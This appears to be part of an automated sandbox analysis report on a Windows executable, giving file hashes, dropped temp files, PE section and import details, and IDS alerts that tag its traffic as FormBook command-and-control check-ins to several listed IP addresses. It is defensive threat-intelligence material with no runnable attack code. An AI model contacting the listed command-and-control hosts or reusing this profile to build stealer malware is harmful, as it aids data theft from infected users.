SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autB907.tmp

Download File

Process:	C:\Users\user\Desktop\HN1GiQ5tF7.exe
File Type:	data
Category:	dropped
Size (bytes):	290304
Entropy (8bit):	7.993871290149696
Encrypted:	true
SSDEEP:	6144:mRjbRx7FaN5s8rniDLTYPX6HcZHd6pJdfNTJwU9W:kHni5sgni0MNSU4
MD5:	4C7E25476413540B93235330B4AC0F8C
SHA1:	C7FC4007D4A617C3718F5822FFAA8E1450C034F9
SHA-256:	E97AAD79B733AECB804EB7D834207DE92C66D2138CE0749D648D4B750C12C174
SHA-512:	2C9BCC9F18F8B13851C29FC6C5CCF6E0761199EEB4105EAD2047F931888E3E0073B544C78D9A59F6004D7EB0DD461923B803D287ED0A00E31868C1B5738B1AAD
Malicious:	false
Reputation:	low
Preview:	...AQK4MLVY8..RY.DIHAD3A.K4MHVY894RY8DIHAD3ARK4MHVY894RY8DIH.D3A\T.CH.P...S..e. (7.1 $S?);y[XZ<6Ld+-a6F/r"Zm....T[6<.IDBeD3ARK4M1WP..T5..$..\|$T.H.r6>.#....$..[.n+S..?:P.T5.8DIHAD3A..4M.WX8....8DIHAD3A.K6LCWR89hVY8DIHAD3A.X4MHFY89DVY8D.HAT3ARI4MNVY894RY>DIHAD3AR;0MHTY894RY:D..AD#AR[4MHVI89$RY8DIHQD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY8.@7!LDIH..7AR[4MH.]89$RY8DIHAD3ARK4MhVYX94RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIH

C:\Users\user\AppData\Local\Temp\overroughly

Download File

Process:	C:\Users\user\Desktop\HN1GiQ5tF7.exe
File Type:	data
Category:	modified
Size (bytes):	290304
Entropy (8bit):	7.993871290149696
Encrypted:	true
SSDEEP:	6144:mRjbRx7FaN5s8rniDLTYPX6HcZHd6pJdfNTJwU9W:kHni5sgni0MNSU4
MD5:	4C7E25476413540B93235330B4AC0F8C
SHA1:	C7FC4007D4A617C3718F5822FFAA8E1450C034F9
SHA-256:	E97AAD79B733AECB804EB7D834207DE92C66D2138CE0749D648D4B750C12C174
SHA-512:	2C9BCC9F18F8B13851C29FC6C5CCF6E0761199EEB4105EAD2047F931888E3E0073B544C78D9A59F6004D7EB0DD461923B803D287ED0A00E31868C1B5738B1AAD
Malicious:	false
Reputation:	low
Preview:	...AQK4MLVY8..RY.DIHAD3A.K4MHVY894RY8DIHAD3ARK4MHVY894RY8DIH.D3A\T.CH.P...S..e. (7.1 $S?);y[XZ<6Ld+-a6F/r"Zm....T[6<.IDBeD3ARK4M1WP..T5..$..\|$T.H.r6>.#....$..[.n+S..?:P.T5.8DIHAD3A..4M.WX8....8DIHAD3A.K6LCWR89hVY8DIHAD3A.X4MHFY89DVY8D.HAT3ARI4MNVY894RY>DIHAD3AR;0MHTY894RY:D..AD#AR[4MHVI89$RY8DIHQD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY8.@7!LDIH..7AR[4MH.]89$RY8DIHAD3ARK4MhVYX94RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIHAD3ARK4MHVY894RY8DIH

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.164858089617597
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	HN1GiQ5tF7.exe
File size:	1'230'848 bytes
MD5:	5ec27889d9aa6f6474ef1b2c34417751
SHA1:	e452b6cec160e2e4e8012847d21f567f31345696
SHA256:	c7cb9d1be13c4c8d5e6c1a2bb6f185f08fcc9f8c86eb5c11e3ef62f8b2ebaf2c
SHA512:	899d54806d7d81274d2bffd02620e2d4ba0e0cfc764e757c7244ffe79819b6b1dd599ad1c56db2f2f8537f79f354d1ae354133de1a0029017a3f5e8ff8b87a82
SSDEEP:	24576:Mtb20pkaCqT5TBWgNQ7aPAyVrEcaBo6hogVROwtS46A:1Vg5tQ7aPAyVHV6hogVhp5
TLSH:	1145CF1363DE8365C3725273BA26B741BEBF782506A1F96B2FD4093DE920122521E773
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6747BE3A [Thu Nov 28 00:50:02 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007FC03CF106FFh
jmp 00007FC03CF03714h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FC03CF0389Ah
cmp edi, eax
jc 00007FC03CF03BFEh
bt dword ptr [004C0158h], 01h
jnc 00007FC03CF03899h
rep movsb
jmp 00007FC03CF03BACh
cmp ecx, 00000080h
jc 00007FC03CF03A64h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FC03CF038A0h
bt dword ptr [004BA370h], 01h
jc 00007FC03CF03D70h
bt dword ptr [004C0158h], 00000000h
jnc 00007FC03CF03A3Dh
test edi, 00000003h
jne 00007FC03CF03A4Eh
test esi, 00000003h
jne 00007FC03CF03A2Dh
bt edi, 02h
jnc 00007FC03CF0389Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FC03CF038A3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FC03CF038F5h
bt esi, 03h
jnc 00007FC03CF03948h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x6360c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x128000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x6360c	0x63800	0394cc9cad9a98b92f316495e916b66b	False	0.9332870406721105	data	7.9077848901738514	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x128000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xca038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xca4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xca4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcaa84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc7b8	0x5a911	data			1.0003261798410075
RT_GROUP_ICON	0x1270cc	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x127144	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x127158	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x12716c	0x14	data	English	Great Britain	1.25
RT_VERSION	0x127180	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x12725c	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T09:33:38.958280+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49841	104.21.16.1	80	TCP
2025-01-11T09:34:03.819288+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49969	163.44.185.183	80	TCP
2025-01-11T09:34:06.381352+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49970	163.44.185.183	80	TCP
2025-01-11T09:34:08.926155+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49971	163.44.185.183	80	TCP
2025-01-11T09:34:11.559946+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49972	163.44.185.183	80	TCP
2025-01-11T09:34:18.288957+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49973	104.21.41.74	80	TCP
2025-01-11T09:34:20.835940+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49974	104.21.41.74	80	TCP
2025-01-11T09:34:23.382737+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49975	104.21.41.74	80	TCP
2025-01-11T09:35:03.933351+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49976	104.21.41.74	80	TCP
2025-01-11T09:35:10.585904+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49977	85.159.66.93	80	TCP
2025-01-11T09:35:13.132765+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49978	85.159.66.93	80	TCP
2025-01-11T09:35:13.132765+0100	2856318	ETPRO MALWARE FormBook CnC Checkin (POST) M4	1	192.168.2.7	49978	85.159.66.93	80	TCP
2025-01-11T09:35:15.679715+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49979	85.159.66.93	80	TCP
2025-01-11T09:35:17.397185+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49980	85.159.66.93	80	TCP
2025-01-11T09:35:23.601600+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49981	103.21.221.4	80	TCP
2025-01-11T09:35:26.174728+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49982	103.21.221.4	80	TCP
2025-01-11T09:35:28.682913+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49983	103.21.221.4	80	TCP
2025-01-11T09:35:31.239514+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49984	103.21.221.4	80	TCP
2025-01-11T09:35:37.069777+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49985	188.114.96.3	80	TCP
2025-01-11T09:35:39.640578+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49986	188.114.96.3	80	TCP
2025-01-11T09:35:42.182622+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49987	188.114.96.3	80	TCP
2025-01-11T09:35:44.733088+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49988	188.114.96.3	80	TCP
2025-01-11T09:35:50.542322+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49989	66.29.137.10	80	TCP
2025-01-11T09:35:52.935360+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49990	66.29.137.10	80	TCP
2025-01-11T09:35:55.513927+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49991	66.29.137.10	80	TCP
2025-01-11T09:35:57.996372+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49992	66.29.137.10	80	TCP
2025-01-11T09:36:03.650469+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49993	203.161.46.205	80	TCP
2025-01-11T09:36:06.193136+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49994	203.161.46.205	80	TCP
2025-01-11T09:36:08.723274+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49995	203.161.46.205	80	TCP
2025-01-11T09:36:11.301736+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49996	203.161.46.205	80	TCP
2025-01-11T09:36:17.855171+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49997	101.32.205.61	80	TCP
2025-01-11T09:36:20.408910+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49998	101.32.205.61	80	TCP
2025-01-11T09:36:22.963622+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49999	101.32.205.61	80	TCP
2025-01-11T09:36:25.487130+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	50000	101.32.205.61	80	TCP
